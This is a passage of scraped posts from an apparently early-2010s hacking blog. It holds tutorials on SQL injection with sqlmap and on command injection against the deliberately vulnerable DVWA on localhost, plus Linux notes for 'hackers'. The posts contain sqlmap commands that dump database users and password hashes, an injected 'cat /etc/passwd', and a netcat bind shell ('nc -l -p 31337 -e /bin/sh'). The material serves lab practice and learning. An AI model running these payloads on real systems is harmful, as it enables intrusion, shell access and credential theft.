<span style="background-color: transparent;">The best way to detect SQL injection in a webapp is by looking into the URL of it. If you are able to change the parameters passed in the URL and that change is reflected in the output of the webapp, you can say that the parameter is being passed to the database at the backed. You will then need to verify if this indeed allows you to inject SQL in it.</span></div>
<div style="text-align: left;">
<span style="background-color: transparent;">URL for the DVWA SQLi page is: </span><br />
http://localhost/dvwa/vulnerabilities/sqli/<br />
<br />
After we enter a value (e.g. 1) in the text box, result is displayed on the page and the url of the page becomes:<br />
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#<br />
<br />
We can see that, after changing the value for parameter in the URL, different results are obtained.<br />
Now, lets check whether this page is vulnerable to SQLi using sqlmap.<br />
<br />
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"</span><br />
<br />
This command can be used to test standalone web pages for SQLi, but in our case, because we are testing a page behind a login page, we are redirected to login.php page as we are not authenticated. To avoid this, we can use --cookie flag of sqlmap.<br />
We need to provide value of cookie set after we have logged in to DVWA. Cookie value can be found out using tools like Burp Suite, Web Scarab etc.<br />
<br />
After finding out cookie value, issue following command:<br />
<br />
<br />
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --dbs</span><br />
<div>
<br /></div>
<br />
The --dbs flag lists database names if SQLi is successful.<br />
<br />
sqlmap returns with goodies :)<br />
<br />
<br />
--snip--<br />
<span style="font-family: 'Courier New', Courier, monospace;">available databases [4]:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] dvwa</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] information_schema</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] mysql</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">[*] w3af_test</span><br />
<div>
<br /></div>
<div>
We will then try to enumerate tables in one of the databases. </div>
<div>
<div>
<span style="background-color: transparent;"><span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" -D dvwa --tables</span></span></div>
</div>
<div>
<span style="background-color: transparent;">And we are not disappointed... :)</span></div>
<div>
<span style="background-color: transparent;"><span style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div>
<span style="background-color: transparent;"></span><br />
<div>
<span style="background-color: transparent;"><span style="font-family: 'Courier New', Courier, monospace;">Database: dvwa</span></span></div>
<span style="background-color: transparent;">
</span><br />
<div>
<span style="background-color: transparent;"><span style="font-family: 'Courier New', Courier, monospace;">[2 tables]</span></span></div>
<span style="background-color: transparent;">
<div>
<span style="font-family: 'Courier New', Courier, monospace;">+-----------+</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">| guestbook |</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">| users |</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">+-----------+</span></div>
<div>
<br /></div>
<div>
You can continue to enumerate the target with rich set of functionality provided by sqlmap. I will show you the mettle of sqlmap straightaway ;)</div>
<div>
<br /></div>
<div>
We can view who is the current user:</div>
<div>
<div>
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --current-user</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">current user: 'root@localhost'</span></div>
<div>
<br /></div>
<div>
or all <span style="background-color: transparent;">list database users:</span><span style="background-color: transparent;"></span></div>
<div>
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users</span></div>
<div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">database management system users [4]:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'debian-sys-maint'@'localhost'</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'root'@'127.0.0.1'</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'root'@'dojo-desktop'</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] 'root'@'localhost'</span></div>
</div>
<div>
<br /></div>
<div>
Now that you have users list, you will want to know their passwords as well. That is why sqlmap provides us with --passwords flag ;)</div>
<div>
<div>
<br /></div>
<div>
<span style="font-family: 'Trebuchet MS', sans-serif;">./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users --passwords</span></div>
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">database management system users password hashes:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] debian-sys-maint [1]:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"> password hash: *3F436344A61D99410B1DD47F05788FD5DD72E483</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">[*] root [1]:</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;"> password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC</span></div>
</div>
<div>
<br /></div>
<div>
<span style="background-color: transparent;">Crack these hashes and enjoy ;)</span></div>
<div>
<br /></div>
</div>
<div>
<br /></div>
</span></div>
<div>
<br /></div>
</div>
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-10139166675986428972011-09-03T19:48:00.000+05:302011-09-03T19:48:38.152+05:30Command Execution on DVWA<div dir="ltr" style="text-align: left;" trbidi="on">
So, the other day, I started delving into webappsec and I hit a bummer very soon and hence this post.<br />
Getting started in webappsec is not that hard actually, there are tons of resources for that, just Google it.<br />
I think the best way to learn something is by doing it actually. There are many "vulnerable by design" distros and live sites to practice web application hacking.<br />
In this post I am going to write about <a href="http://www.dvwa.co.uk/">DVWA </a>and Command Execution vulnerability which is present in it and how to exploit it.<br />
This being the first post regarding DVWA, I will start with the setup and tools required for this part. Lets get started!<br />
<br />
<a name='more'></a><br />
<br />
<b>Web security dojo</b><br />
It is a complete distro for web application hackers. It contains various security testing tools and vulnerable web applications built in it so as to provide a complete testing environment for you.<br />
You can visit the homepage <a href="http://www.mavensecurity.com/web_security_dojo/">here</a><br />
And download it from <a href="http://sourceforge.net/projects/websecuritydojo/files/">here</a><br />
<br />
<b>Damn Vulnerable Web Application</b><br />
As the name suggests, it is a damn vulnerable web application. You get all top 10 OWASP vulnerabilities in this package for your exploitation pleasure but no prizes for getting a shell because it is designed for that purpose ;)<br />
I am using web security dojo which has DVWA already installed along with other vulnerable webapps, so no need of downloading.<br />
If you want to download and have it set up yourself, you can go ahead and get it from <a href="http://www.dvwa.co.uk/">here</a>.<br />
<br />
<b>Burp suite</b><br />
It is an integrated platform for performing security testing of web applications. Agian, I am using this tool off the 'dojo'.<br />
Dowload and more: <a href="http://portswigger.net/burp/">Burp Suite</a><br />
<br />
Figure out how to start DVWA and burp. And how to have burp intercepting all the traffic between your browser and the web application. Its really easy ;)<br />
<br />
That's all we need for this part. Lets get started with <b>Command Execution</b><br />
<b><br /></b><br />
Command Execution is a technique used via a web interface in order to execute OS commands on the web server.<br />
Go to the command execution page. We are greeted with a text box and a submit button of a ping for free utility.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-8k2zqmjbRz4/TmIOtuPCedI/AAAAAAAAB2E/7y8csn_6rnk/s1600/Web+Security+Dojo+v1.2-2011-09-03-16-56-42.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-8k2zqmjbRz4/TmIOtuPCedI/AAAAAAAAB2E/7y8csn_6rnk/s200/Web+Security+Dojo+v1.2-2011-09-03-16-56-42.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Enter an IP address and click on submit. The request will be intercepted by burp.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-fbS-u126VXs/TmITCEHUXdI/AAAAAAAAB2I/Bk9DGA_zkhw/s1600/Web+Security+Dojo+v1.2-2011-09-03-17-10-01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-fbS-u126VXs/TmITCEHUXdI/AAAAAAAAB2I/Bk9DGA_zkhw/s200/Web+Security+Dojo+v1.2-2011-09-03-17-10-01.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, the app is sending IP address provided by us and then calling the submit function.<br />
Next, try providing input as 127.0.0.1 & ls hoping it to be this easy but you will be welcomed by this screen as a result:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Tkb5F3t3MUM/TmIVvjWcgVI/AAAAAAAAB2M/yURo0qU8wo8/s1600/Web+Security+Dojo+v1.2-2011-09-03-17-26-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://1.bp.blogspot.com/-Tkb5F3t3MUM/TmIVvjWcgVI/AAAAAAAAB2M/yURo0qU8wo8/s200/Web+Security+Dojo+v1.2-2011-09-03-17-26-07.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Try as many variations as possible to provide a command to execute. You will see this every time!<br />
<br />
Well, that is a bummer! Any modification to IP address is being caught as invalid! And they said it is an easy demo!<br />
After looking carefully, you will see that the security is set to <b>high </b>as shown in the 2nd screenshot.<br />
Let's get introduced to DVWA security then...<br />
<b>DVWA security</b><br />
DVWA comes with a very nice feature which lets you control the security of web app and it is set to high as default after installation. This feature lets you try your skills against low to highly secured environments. According to documentation high security mode is secure against all vulnerabilities and it shows good programming practices. There is a link on each page which shows the source code of each mode and you can compare secure and insecure practices. Very nice, now change it to <b>low </b>and let us try again...<br />
<br />
After you enter an IP and the request is intercepted by burp, we will modify it on the fly in forward it to the app to see its response.<br />
To modify a request on the fly, open the burp suite and go to the raw request captured as we have seen earlier. You can place the cursor at the end of IP address and change the content there. We want to add some command to it and we want it to be encoded. Right click in the window and choose 'URL-encode as you type' option.<br />
I provided 127.0.0.1[space]&[space]ls&security as input, it should look like this<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-CAcaysZfLw0/TmIuwobXDEI/AAAAAAAAB2Q/2qzMxRsDZT8/s1600/Web+Security+Dojo+v1.2-2011-09-03-19-05-52.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://4.bp.blogspot.com/-CAcaysZfLw0/TmIuwobXDEI/AAAAAAAAB2Q/2qzMxRsDZT8/s200/Web+Security+Dojo+v1.2-2011-09-03-19-05-52.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
forward this request and return to the browser.<br />
Yay! It is successful!<br />
<br />
<br />
<span style="color: red;">help</span><br />
<span style="color: red;">index.php</span><br />
<span style="color: red;">source</span><br />
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.008 ms<br />
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.007 ms<br />
That is the directory listing we have been waiting for! So this was <b>this easy</b> after all! After you see successful command execution do a victory dance and return to your desk. We can do so much with this!<br />
send in cat /etc/passwd<br />
<span style="color: blue;">ip=127.0.0.0+cat+/etc/passwd</span><br />
we get:<br />
<br />
<span style="color: red;">root:x:0:0:root:/root:/bin/bash</span><br />
<span style="color: red;">daemon:x:1:1:daemon:/usr/sbin:/bin/sh</span><br />
<span style="color: red;">bin:x:2:2:bin:/bin:/bin/sh</span><br />
<span style="color: red;">sys:x:3:3:sys:/dev:/bin/sh</span><br />
<span style="color: red;">sync:x:4:65534:sync:/bin:/bin/sync</span><br />
<span style="color: red;">games:x:5:60:games:/usr/games:/bin/sh</span><br />
<span style="color: red;">man:x:6:12:man:/var/cache/man:/bin/sh</span><br />
<span style="color: red;"><<snip>></span><br />
Or read web.config file or have a shell..??<br />
<span style="color: blue;">ip=127.0.0.1+nc+-l+-p+31337+-e+/bin/sh&submit=submit</span><br />
<div style="color: blue;">
<br /></div>
<div>
Connect to port 31337 and enjoy :)</div>
<div>
<br /></div>
<div>
It was really a basic thing but I have done a huge post, hope my blog will get some hits ;)</div>
<div>
References:<br />
<a href="https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf">https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf</a></div>
<div>
<br /></div>
<br />
<br /></div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-4538251661335272060.post-15046485431019611842011-08-27T12:39:00.000+05:302011-08-27T12:39:57.498+05:30Quick Links<div dir="ltr" style="text-align: left;" trbidi="on">I was working on Linux privilege escalation and found these 2 very useful pages.<br />
1.This gives a quick intro to Linux privilege escalation.<br />
<a href="http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html">http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html</a><br />
<br />
2. And this gives detailed description of the above post! Kudos to g0tmi1k!<br />
<a href="http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html">http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html</a></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-9161039389137909772011-08-19T23:38:00.000+05:302011-08-27T12:46:03.642+05:30Linux for hackers - Part II<div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div style="background-color: transparent;"><div class="separator" style="clear: both; text-align: center;"><a href="http://imgs.xkcd.com/comics/cautionary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://imgs.xkcd.com/comics/cautionary.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div style="background-color: transparent;"><span id="internal-source-marker_0.2205236447043717" style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After posting 1st part and my </span><a href="http://www.betterhacker.com/2011/07/linux-for-hackers-part-i.html"><span style="background-color: transparent; color: #000099; font-family: Arial; font-size: 12pt; vertical-align: baseline; white-space: pre-wrap;">1st entry</span></a><span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the blog, I decided that I would post at least 1 new entry every week, but here I am again, writing after 4 weeks. Now looking back, I feel like the 1st entry isn't how I wanted it to be.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I wanted to put the things present in Linux which are required for hackers most often. So in this part, I would list all such things and briefly explain their importance so that it doesn't look like a tutorial.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obviously this list not extensive or authorized. I might miss something very important and put something very basic, because I am no master in Linux. I am still learning and I will always be learning.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<a name='more'></a><span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Various directories and their importance:</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Configuration files specific to the machine are kept here.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/dev</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Device files. In *nix systems, everything is a file. This directory contains special files which enable us to interact with various devices.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/usr </span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">All programs are installed here.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/log</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Stores log files from various programs. </span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Important Files:</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/passwd</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file contains one entry per line for each user (or user account) of the system. All fields are separated by a colon (:) symbol. Total seven fields as follows:</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<ol><li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Username</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Password</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: An x character indicates that encrypted password is stored in /etc/shadow file.</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User ID (UID)</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Group ID (GID)</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The primary group ID (stored in /etc/group file)</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User ID Info</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The comment field. It allow you to add extra information about the users such as user's full name, phone number etc. This field use by finger command.</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Home directory</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Command/shell</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The absolute path of a command or shell (/bin/bash).</span></li>
</ol><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/shadow</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file stores actual password in encrypted format for user's account.</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/services</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file maps port numbers to services</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/hosts</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Contains host names and their corresponding IP addresses used for name resolution</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/resolv.conf</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file is used to configure the Domain Name System (DNS) resolver library.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/network/interfaces</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">See all available network interfaces</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/proc/cpuinfo</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Information about the processor</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/proc/uptime</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The time the system has been up.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/proc/sys/kernel/randomize_va_space</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is a special file which holds the option which determines the type of process address randomization being used in the system.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">options can be:</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">0 - No address space randomization</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 - Make the addresses of mmap base,stack and VDSO page randomized.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2 - Additionally enable heap randomization</span></div><div style="background-color: transparent;"><span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
</span></div><div style="background-color: transparent;"><span style="font-family: Arial;"><span style="white-space: pre-wrap;">That's all for this part then. It barely scratches the vast surface of linux systems, but it is a start nonetheless. In the next part, I am planning to document some of the most important command line tools for hackers. Lets hope it comes soon! </span></span></div><div style="background-color: transparent;"><span style="font-family: Arial;"><span style="white-space: pre-wrap;"><br />
</span></span></div></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-82654305636394596582011-07-23T12:28:00.000+05:302011-08-27T12:45:29.880+05:30Linux for hackers - Part I<div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div style="background-color: transparent;"><span id="internal-source-marker_0.0038698429707437754" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hackers & Linux share a very intimate relation. Linux offers hackers all the freedom they nee and hackers care only for that very thing! You can do whatever you like with your system and that is the biggest factor where Linux wins over. Achieving perfection, however, can be a daunting task given the enormity of this computer OS.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this multi part series, I will be discussing what basic Linux utilities are needed on day to day basis. Also this will serve as a reference for me if I forget something ;)</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">One thing to note here is that this is not a “Linux for beginners” tutorial. This is “Linux for newbie hackers”</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I have handpicked some of the most important things that one should must know. There is no order of any kind in these utilities.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<a name='more'></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GREP</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">‘grep’ is one of the most important and useful command. It is very helpful in awk,shell,sed and perl scripting.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">What is grep used for?</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - Searching.</span><br />
